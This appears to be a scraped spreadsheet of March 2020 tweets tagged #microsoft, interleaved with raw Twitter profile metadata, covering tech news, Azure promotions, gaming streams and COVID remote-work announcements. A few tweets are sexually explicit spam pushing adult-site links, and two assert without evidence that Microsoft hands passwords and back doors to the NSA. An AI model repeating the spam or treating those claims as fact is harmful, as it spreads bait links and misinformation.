    <t>{'id': 14615421, 'id_str': '14615421', 'name': 'Chris Pietschmann', 'screen_name': 'crpietschmann', 'location': 'Planet Earth', 'description': '#MicrosoftMVP | Founder @Build5Nines | #MCT | @MkeAzure | Author | Speaker | Teacher | #Developer | #Azure | #IoT | #DevOps | Human / Earthling ðŸŒŽ', 'url': 'https://t.co/Un7BYAV0jB', 'entities': {'url': {'urls': [{'url': 'https://t.co/Un7BYAV0jB', 'expanded_url': 'http://Build5Nines.com', 'display_url': 'Build5Nines.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5720, 'friends_count': 2268, 'listed_count': 435, 'created_at': 'Thu May 01 15:31:19 +0000 2008', 'favourites_count': 30214, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 27964,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'http://pbs.twimg.com/profile_images/785597420772044800/aj9CwDXn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/785597420772044800/aj9CwDXn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14615421/1553222908', 'profile_link_color': '065CB8',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</si>
  <si>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00:35:31 +0000 2020</t>
  </si>
  <si>
    <t>#THEPeeridiumPodcast #Episode5 is going LIVE! Come chat with us over on https://t.co/uZMiUYoCh6 (link in bio). - OutBREAK #Peeridium #Gamer #NintendoSwitch #Nintendo #Playstation4 #Sony #XboxOne #Microsoft #TheLastOfUs... https://t.co/r92LszhaWU</t>
  </si>
  <si>
    <t>{'id': 244966200, 'id_str': '244966200', 'name': 'Bobby Yoda', 'screen_name': 'PeerOutBRK', 'location': 'Peeridium HQ, MD', 'description': 'OutBREAK (noun): Co-founder of Peeridium. Self-proclaimed professional journalist and Content Creator. Dad/daddy pronouns.', 'url': 'https://t.co/IGVF2Lh4rG', 'entities': {'url': {'urls': [{'url': 'https://t.co/IGVF2Lh4rG', 'expanded_url': 'http://www.peeridium.com', 'display_url': 'peeridium.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 262, 'friends_count': 1568, 'listed_count': 28, 'created_at': 'Sun Jan 30 15:14:16 +0000 2011', 'favourites_count': 6785, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4516,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'http://pbs.twimg.com/profile_images/815650694543904768/c-eb49Iw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/815650694543904768/c-eb49Iw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/244966200/1530537531',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</si>
  <si>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00:30:13 +0000 2020</t>
  </si>
  <si>
    <t>I do not often fuck in a tender ass. Painfully
https://t.co/3PMGzvtP9I
#Indiana
 #friends #microsoft https://t.co/NhWRx34e59</t>
  </si>
  <si>
    <t>{'id': 1234250858877063168, 'id_str': '1234250858877063168', 'name': 'Wendy Anderson', 'screen_name': 'tibeerttingcom', 'location': 'Omaha, USA', 'description': 'Our Relationship is meant to be. Something that was written in the stars and drawn into our destiny.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Sun Mar 01 22:55:16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'http://pbs.twimg.com/profile_images/1234260386448314375/m5bDwFJS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234260386448314375/m5bDwFJS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234250858877063168/1583105736',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</si>
  <si>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00:30:04 +0000 2020</t>
  </si>
  <si>
    <t>Good context and coverage on the recent announcement from #Microsoft and others regarding our corporate action on #climate change https://t.co/cZ44ihLCSz</t>
  </si>
  <si>
    <t>{'id': 78624501, 'id_str': '78624501', 'name': 'Srinivasa Sivakumar', 'screen_name': 'SriniTechGeek', 'location': 'Banglaore, India', 'description': 'Chief Digital Advisor', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 149, 'friends_count': 101, 'listed_count': 134, 'created_at': 'Wed Sep 30 15:09:53 +0000 2009', 'favourites_count': 1142, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6679,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'http://pbs.twimg.com/profile_images/378800000329801474/00e740ef60aa0464abc894e84a1e5388_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000329801474/00e740ef60aa0464abc894e84a1e5388_normal.png',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</si>
  <si>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00:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat...... #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/OrSB520hNJ</t>
  </si>
  <si>
    <t>Fri Mar 06 00:28:22 +0000 2020</t>
  </si>
  <si>
    <t>Welcome to #linuxdotcom
Can we interest you in #microsoft ?
https://t.co/Zfw9SP9rQk</t>
  </si>
  <si>
    <t>Fri Mar 06 00:27:30 +0000 2020</t>
  </si>
  <si>
    <t>"Microsoft offers back doors at the operating systems level, not just the Internet/communications level; the #NSA as a whole has come to share a bed with #Microsoft " https://t.co/fug0FsaCh0</t>
  </si>
  <si>
    <t>Fri Mar 06 00:26:09 +0000 2020</t>
  </si>
  <si>
    <t>Passwords were always at risk as #microsoft gives them to the #nsa https://t.co/bRrtBX1gHQ</t>
  </si>
  <si>
    <t>Fri Mar 06 00:26:02 +0000 2020</t>
  </si>
  <si>
    <t>#SystemD: Back To The Future https://t.co/oSPyUrcamB A creature in its death throes, Sun Microsystems gave birth to #Solaris #SMF  the product of a disturbing union between #Unix System V and the #Microsoft #Windows Registry. #Linux #SysAdmin #programming #python  #rant https://t.co/Df7ahilWfK</t>
  </si>
  <si>
    <t>{'id': 948014469044678656, 'id_str': '948014469044678656', 'name': 'Igor Os', 'screen_name': 'igor_os777', 'location': 'Delaware, USA', 'description': 'Experienced #Unix/#Linux SysAdmin with over twenty years background in Systems Analysis, Problem Resolution, Application Support, and Process #Automation.', 'url': 'https://t.co/fFtPhqGHsR', 'entities': {'url': {'urls': [{'url': 'https://t.co/fFtPhqGHsR', 'expanded_url': 'https://igoros.com', 'display_url': 'igoros.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4938, 'friends_count': 2024, 'listed_count': 74, 'created_at': 'Tue Jan 02 02:13:57 +0000 2018', 'favourites_count': 28069, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28086,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'http://pbs.twimg.com/profile_images/1229141138264686594/ql37HCpk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229141138264686594/ql37HCpk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/948014469044678656/1581885059',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</si>
  <si>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00:23:07 +0000 2020</t>
  </si>
  <si>
    <t>"This Week in Rust is openly developed on GitHub."
No, it cannot be openly developed on #proprietarysoftware platform of #microsoft 
https://t.co/PCWePAahM5</t>
  </si>
  <si>
    <t>Fri Mar 06 00:22:07 +0000 2020</t>
  </si>
  <si>
    <t>L2bridge Container Networking https://t.co/h3LLCmSi0r #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Mar 06 00:21:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has announced upcoming changes to Azure as a result of their regular portfolio reviews, ensuring that their certifications remain technically relevant.
Read the full article here: https://t.co/ybjpdelrom
#AdvancedTraining #Microsoft #MicrosoftAzure #Azure #ITcourse</t>
  </si>
  <si>
    <t>{'id': 330766676, 'id_str': '330766676', 'name': 'Advanced Training', 'screen_name': 'advancedtrainin', 'location': 'Australia', 'description': 'Instructor Led | Fast Track | Blend IT | AT Workshops | Self-Paced | One-on-One | Modular | E-Learning | Roving\n#Microsoft #BigData #PowerBI #SQL #CRM #Windows', 'url': 'https://t.co/DlT9FtTx7c', 'entities': {'url': {'urls': [{'url': 'https://t.co/DlT9FtTx7c', 'expanded_url': 'http://www.advancedtraining.com.au', 'display_url': 'advancedtraining.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 498, 'friends_count': 1979, 'listed_count': 28, 'created_at': 'Thu Jul 07 03:43:20 +0000 2011', 'favourites_count': 563, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 504,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'http://pbs.twimg.com/profile_images/1430246863/Advanced_Training_Logo_-_transparant_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1430246863/Advanced_Training_Logo_-_transparant_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/330766676/1570577149',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</si>
  <si>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00:20:56 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/EJHL9L8dZG #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Mar 06 00:18:56 +0000 2020</t>
  </si>
  <si>
    <t>The 10 best #Xbox 360 games under $10 https://t.co/kYtm01u0AO  #microsoft</t>
  </si>
  <si>
    <t>{'id': 2280489650, 'id_str': '2280489650', 'name': 'GameChange', 'screen_name': '_gamechange', 'location': '', 'description': 'Fantasy Football and videogames. Featuring FPL tools, opinion, game reviews, news, infographics, quizzes and top-tens.', 'url': 'https://t.co/HvmVA0oPGH', 'entities': {'url': {'urls': [{'url': 'https://t.co/HvmVA0oPGH', 'expanded_url': 'http://game-change.co.uk', 'display_url': 'game-change.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1184, 'friends_count': 4122, 'listed_count': 45, 'created_at': 'Tue Jan 07 11:54:47 +0000 2014', 'favourites_count': 531, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 45860,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'http://pbs.twimg.com/profile_images/1017720768917098496/-AFKIfrz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1017720768917098496/-AFKIfrz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2280489650/1546085964',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</si>
  <si>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00:16:02 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Microsoft Issues Fix for Windows 10 Drivers Blocked by Core Isolation:" https://t.co/wdkU9afDj4
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Mar 06 00:10:03 +0000 2020</t>
  </si>
  <si>
    <t>Miscrosoft Business Applications Summit is in 2 Months.  Connect, Collaborate and Learn about all things Dynamics.  Register Today, and we will see you there!  https://t.co/FPXOqJS4Eb 
#Dynamics #BusinessApplications #Microsoft #Dynamics365 https://t.co/X0TmSaZxhf</t>
  </si>
  <si>
    <t>Fri Mar 06 00:06:58 +0000 2020</t>
  </si>
  <si>
    <t>We're giving away 15 - 3 month subscriptions to #XboxGamePassUltimate sponsored by #Microsoft #Xbox #xboxgamepass #giveaway
Enter here https://t.co/EI3yJMuoep
Thank you @XboxGamePass @Xbox @Meganisrad 
@blkdog7 @CoastalMichelle @MattoMcFly 
What's your favorite #gamepass game? https://t.co/qWM2KBct6K</t>
  </si>
  <si>
    <t>{'id': 25159112, 'id_str': '25159112', 'name': 'Video Game Outsiders', 'screen_name': 'VGOPodcast', 'location': 'Get our free Video Game Outsiders mobile app on iOS/Android', 'description': "@RiotCast's #videogames #comedy #podcast with @CoastalMichelle @Blkdog7 &amp; @MattoMcFly. Live Tues 9pm e, Fri at 10pm e on @Dash_Radio, DL everywhere. Since 2005!", 'url': 'http://t.co/LDt7pMI8yn', 'entities': {'url': {'urls': [{'url': 'http://t.co/LDt7pMI8yn', 'expanded_url': 'http://videogameoutsiders.com/', 'display_url': 'videogameoutsiders.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6087, 'friends_count': 1374, 'listed_count': 63, 'created_at': 'Wed Mar 18 21:28:15 +0000 2009', 'favourites_count': 9023, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7489,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'http://pbs.twimg.com/profile_images/1011722221813764098/1YtbiLsv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1011722221813764098/1YtbiLsv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25159112/1578334748', 'profile_link_color': '1F8C90',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</si>
  <si>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00:05:49 +0000 2020</t>
  </si>
  <si>
    <t>Security researchers interested in leveraging #ArtificialIntelligence and #MachineLearning please consider submitting a proposal to the #Microsoft #Security AI RFP https://t.co/yvnSC3kdMk #cybersecurity #DeepLearning #CSResearch #IoT</t>
  </si>
  <si>
    <t>{'id': 244571744, 'id_str': '244571744', 'name': 'Ben Zorn', 'screen_name': 'benzorn', 'location': 'Seattle, Washington', 'description': 'Partner Researcher, RiSE group, Microsoft Research, Redmond. Interests include programming language design and implementation. https://t.co/EcuFKXpS5p', 'url': 'https://t.co/zfA5ZPelfT', 'entities': {'url': {'urls': [{'url': 'https://t.co/zfA5ZPelfT', 'expanded_url': 'http://aka.ms/zorn', 'display_url': 'aka.ms/zorn', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/EcuFKXpS5p', 'expanded_url': 'http://bit.ly/2r7ppeR', 'display_url': 'bit.ly/2r7ppeR', 'indices': [127, 150]}]}}, 'protected': False, 'followers_count': 1124, 'friends_count': 452, 'listed_count': 47, 'created_at': 'Sat Jan 29 16:29:34 +0000 2011', 'favourites_count': 6878, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1491,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'http://pbs.twimg.com/profile_images/1164232714569957376/KbV5SeJD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1164232714569957376/KbV5SeJD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/244571744/1467156540',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</si>
  <si>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Fri Mar 06 00:04:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Flight Simulator weekly update schedule hampered due to coronavirus concerns #microsoft #flightsimulator https://t.co/ts38bTaBAc https://t.co/YdVphdjkRB</t>
  </si>
  <si>
    <t>{'id': 14357338, 'id_str': '14357338', 'name': 'Neowin', 'screen_name': 'NeowinFeed', 'location': 'Plymouth, MI', 'description': 'Tech news, views and reviews, covering Microsoft and the world of tech.', 'url': 'http://t.co/fYjGhrm9Av', 'entities': {'url': {'urls': [{'url': 'http://t.co/fYjGhrm9Av', 'expanded_url': 'http://www.neowin.net', 'display_url': 'neowin.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 31523, 'friends_count': 5, 'listed_count': 1603, 'created_at': 'Fri Apr 11 01:53:45 +0000 2008', 'favourites_count': 100, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 71573, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '486583', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/614811829823406080/M7y2TheR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/614811829823406080/M7y2TheR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14357338/1441609288', 'profile_link_color': '52607D', 'profile_sidebar_border_color': 'D2DFEE', 'profile_sidebar_fill_color': 'F8F8F8', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 00:03:03 +0000 2020</t>
  </si>
  <si>
    <t>They said it couldn't be done!  @BlueJeansNet Gateway for @MicrosoftTeams is now available to purchase online. By far and away the easiest #CVI solution to deploy, manage, &amp;amp; use. Only 4 steps to connect your room systems to #Microsoft Teams. https://t.co/4eswTToEJJ https://t.co/5EEd901Z9q</t>
  </si>
  <si>
    <t>{'id': 620453701, 'id_str': '620453701', 'name': 'Zachary Bosin', 'screen_name': 'zbosin', 'location': 'San Francisco, CA', 'description': 'Product Marketing @BlueJeansNet\nPassionate about making your meetings more productive', 'url': 'https://t.co/WwNc2PhHFZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/WwNc2PhHFZ', 'expanded_url': 'https://www.bluejeans.com/', 'display_url': 'bluejeans.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 99, 'friends_count': 172, 'listed_count': 6, 'created_at': 'Wed Jun 27 23:48:02 +0000 2012', 'favourites_count': 117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 232,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'http://pbs.twimg.com/profile_images/1045041020512006144/ksm2t3pV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1045041020512006144/ksm2t3pV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/620453701/1531426735', 'profile_link_color': '1478C7',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</si>
  <si>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00:02:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft encourages Seattle area and Bay Area employees to work from home if possible through March 25 and asks sick employees to stay home https://t.co/zIBreh7DDq</t>
  </si>
  <si>
    <t>{'id': 1203589237095821320, 'id_str': '1203589237095821320', 'name': 'NewsML', 'screen_name': 'NewsMLOfficial', 'location': 'San Francisco', 'description': 'NewsML generates Newsletters using #MachineLearning.  With the power of #NLP we generate a summary of the most important tech news in your language.', 'url': 'https://t.co/NMIQWU1d42', 'entities': {'url': {'urls': [{'url': 'https://t.co/NMIQWU1d42', 'expanded_url': 'http://www.newsml.io', 'display_url': 'newsml.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 39, 'friends_count': 666, 'listed_count': 4, 'created_at': 'Sun Dec 08 08:16:59 +0000 2019', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1903, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1203589321036423168/HAH4VzBc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1203589321036423168/HAH4VzBc_normal.jpg',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</si>
  <si>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00:02:21 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Virgin Media Data Breach Exposes Info of 900,000 Customers:" https://t.co/KTTMFYTjPV
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Mar 06 00:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Hey! Did you know that you can get paid to use Bing as your search engine? Here's what you need to know about Microsoft Rewards (and how to earn 'em faster too). Check it out: https://t.co/gg2Tr6YRbq #microsoft #bing https://t.co/oowpAX3DsL</t>
  </si>
  <si>
    <t>{'id': 9973392, 'id_str': '9973392', 'name': 'Dave Taylor', 'screen_name': 'DaveTaylor', 'location': 'Boulder, CO', 'description': 'Writer, YouTuber, entrepreneur, film and media critic, techie, gamer and proud father to three great kids!', 'url': 'https://t.co/mGGeTeJwCl', 'entities': {'url': {'urls': [{'url': 'https://t.co/mGGeTeJwCl', 'expanded_url': 'https://www.AskDaveTaylor.com', 'display_url': 'AskDaveTaylor.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16390, 'friends_count': 845, 'listed_count': 1242, 'created_at': 'Mon Nov 05 17:56:51 +0000 2007', 'favourites_count': 4741, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 73282,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'http://pbs.twimg.com/profile_images/831750298699980800/HT2dTT8z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/831750298699980800/HT2dTT8z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/9973392/1578147103',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</si>
  <si>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23:57:27 +0000 2020</t>
  </si>
  <si>
    <t>The best of the week in #callofdutymodernwarfare 
.
.
.
.
#callofduty #modernwarfare #activision #dead #comedy #new #compilation #baja #shot #xboxone #xbox #microsoft #videogames #news #lol #bestofweek #novedad en... https://t.co/0TVg8KQEi3</t>
  </si>
  <si>
    <t>{'id': 1186774872938176513, 'id_str': '1186774872938176513', 'name': 'Grana2', 'screen_name': 'Grana2Geek', 'location': '', 'description': 'Gamer - Geek - Collector', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Tue Oct 22 22:42:45 +0000 2019', 'favourites_count': 4,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'http://pbs.twimg.com/profile_images/1186775160478715904/8tUIaZKD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186775160478715904/8tUIaZKD_normal.jpg',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</si>
  <si>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23:52:40 +0000 2020</t>
  </si>
  <si>
    <t>Guys you keep asking me, but my 18  pics and videos are on my website for free, I can't risk to get banned
https://t.co/mlHV0oNkAu
#Arvada
 #basketball #microsoft https://t.co/1FXIiQuNNz</t>
  </si>
  <si>
    <t>{'id': 1233014805256077312, 'id_str': '1233014805256077312', 'name': 'Sally Harper', 'screen_name': 'SallyHa67277072', 'location': 'Hartford, USA', 'description': 'I swear I couldnâ€™t love you more than I do right now, and yet I know I will tomorrow', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Thu Feb 27 13:03:39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'http://pbs.twimg.com/profile_images/1233019104447082501/tvJ3mVcl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233019104447082501/tvJ3mVcl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233014805256077312/1582809673',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</si>
  <si>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23:52:17 +0000 2020</t>
  </si>
  <si>
    <t>RESOLVED: HDC Partial Outage https://t.co/G7IRMCnxTF #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 23:49:55 +0000 2020</t>
  </si>
  <si>
    <t>Cisco Network Assurance: Its a journey! https://t.co/DLm6kYqjJb
For more info: https://t.co/UaARRiVU5N #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto https://t.co/9PCKlwyo8X</t>
  </si>
  <si>
    <t>Thu Mar 05 23:47:19 +0000 2020</t>
  </si>
  <si>
    <t>Light bulb for "One More Light" by @linkinpark
Paperboat in remembrance of Chester #RIP
#ThrowbackThursday @ one of my 1st #vids
https://t.co/H6MuViaOdU
#fortnite #battleroyale #twitch #fb #gaming #gamer #pc #xbox #tat #xboxone #ps4 #playstation #microsoft #sony #game #youtube https://t.co/NpwIcQI1Zf</t>
  </si>
  <si>
    <t>{'id': 1094435397944438784, 'id_str': '1094435397944438784', 'name': 'TheUnheardTruthðŸŒŒYT', 'screen_name': 'OneNOnlyUnheard', 'location': 'ðŸ‘‡Subscribe to my YouTubeðŸ‘‡', 'description': 'Part-time Gamer / Montage Creator\n\n|\n\nHelp me get to 750 subs on my YouTube\n@500 subs Right Now!\n\n|\n\nMessage me for your own montage!!', 'url': 'https://t.co/wM91shnfWY', 'entities': {'url': {'urls': [{'url': 'https://t.co/wM91shnfWY', 'expanded_url': 'http://Youtube.com/TheUnheardTruth', 'display_url': 'Youtube.com/TheUnheardTruth', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 48, 'friends_count': 23, 'listed_count': 0, 'created_at': 'Sun Feb 10 03:18:27 +0000 2019', 'favourites_count': 225, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 705, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1142650259673407489/L5VqBsHB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1142650259673407489/L5VqBsHB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1094435397944438784/1575739371',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</si>
  <si>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23:46:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is exploring a new direction for the Start Menu, says Live Tiles arent going anywhere https://t.co/wMNHtvzDUl
via @TechSpot #computing #microsoft https://t.co/3mkWK3E0k7</t>
  </si>
  <si>
    <t>{'id': 749569147818938368, 'id_str': '749569147818938368', 'name': 'GeekNews.Link', 'screen_name': 'geeknewslink', 'location': '', 'description': 'GEEKNEWS - most popular news on social media - Trending Tech News', 'url': 'https://t.co/btrKhsCvjY', 'entities': {'url': {'urls': [{'url': 'https://t.co/btrKhsCvjY', 'expanded_url': 'https://www.geeknews.link', 'display_url': 'geeknews.link', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 227, 'friends_count': 68, 'listed_count': 46, 'created_at': 'Sun Jul 03 11:43:05 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 29036,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'http://pbs.twimg.com/profile_images/809778934040719360/rIh-GsGo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/809778934040719360/rIh-GsGo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/749569147818938368/1481901352', 'profile_link_color': '52C07A',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</si>
  <si>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23:44:49 +0000 2020</t>
  </si>
  <si>
    <t>@daharsh4 kicking off our first #powerappsgov meet-up at Microsoft with a great overview of #governance!
 #powerautomate #powerplatform #powerapps   #microsoft  #cds https://t.co/JN0hNDFY7I</t>
  </si>
  <si>
    <t>{'id': 2444628342, 'id_str': '2444628342', 'name': 'James Novak', 'screen_name': 'crmdevjim', 'location': 'Springfield, VA', 'description': 'Business Applications MVP, Dynamics developer', 'url': 'https://t.co/fdRHyAYCtd', 'entities': {'url': {'urls': [{'url': 'https://t.co/fdRHyAYCtd', 'expanded_url': 'http://futurezconsulting.com', 'display_url': 'futurezconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 676, 'friends_count': 441, 'listed_count': 13, 'created_at': 'Tue Apr 15 00:20:15 +0000 2014', 'favourites_count': 894, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1375,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'http://pbs.twimg.com/profile_images/1223282254207766528/EozILPF8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223282254207766528/EozILPF8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2444628342/1582226362',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</si>
  <si>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23:43:17 +0000 2020</t>
  </si>
  <si>
    <t>Going live with The Division 2!!!! https://t.co/NityMexBI0 - kodgaming90
#XboxOne #division2 #twitchstreamer #twitch #supportsmallstreamers  #gamingislife #twitchaffiliate #ubisoft #microsoft https://t.co/M4TQHQYlaM</t>
  </si>
  <si>
    <t>{'id': 1217306900372639744, 'id_str': '1217306900372639744', 'name': 'Kodgaming', 'screen_name': 'stealthkod90', 'location': '', 'description': "what's up guys?? I'm Brian. Team Xbox/Mixer Streamer \n\nhttps://t.co/e7u9eiUaUL\nhttps://t.co/vuaBYStTn7", 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/e7u9eiUaUL', 'expanded_url': 'http://mixer.com/stealthkiller72', 'display_url': 'mixer.com/stealthkiller72', 'indices': [55, 78]}, {'url': 'https://t.co/vuaBYStTn7', 'expanded_url': 'http://twitch.tv/kodgaming90', 'display_url': 'twitch.tv/kodgaming90', 'indices': [79, 102]}]}}, 'protected': False, 'followers_count': 261, 'friends_count': 658, 'listed_count': 0, 'created_at': 'Wed Jan 15 04:46:06 +0000 2020', 'favourites_count': 770, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 468, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1217307131701080064/VB-Uibvy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217307131701080064/VB-Uibvy_normal.jpg',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</si>
  <si>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23:38:02 +0000 2020</t>
  </si>
  <si>
    <t>Help guide your team to better use Microsoft tools, such as Microsoft Flow and Power BI, to automate and turn data into Business Insights. https://t.co/DIxqqMKrpv #powerbi #conference #tech #techtalk #microsoft https://t.co/ewhZfA0b5x</t>
  </si>
  <si>
    <t>{'id': 130955304, 'id_str': '130955304', 'name': 'Aptude IT Consulting', 'screen_name': 'Aptude', 'location': 'Naperville, IL', 'description': 'Full-service IT consulting firm providing IT develpment and staffing services. Oracle Gold Partner and Microsoft Partner.', 'url': 'http://t.co/T975TPC6WK', 'entities': {'url': {'urls': [{'url': 'http://t.co/T975TPC6WK', 'expanded_url': 'http://www.aptude.com', 'display_url': 'aptude.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 380, 'friends_count': 515, 'listed_count': 13, 'created_at': 'Thu Apr 08 21:08:16 +0000 2010', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 838,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'http://pbs.twimg.com/profile_images/1016787808688791553/Pb5Ft2gL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1016787808688791553/Pb5Ft2gL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/130955304/1531256068',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</si>
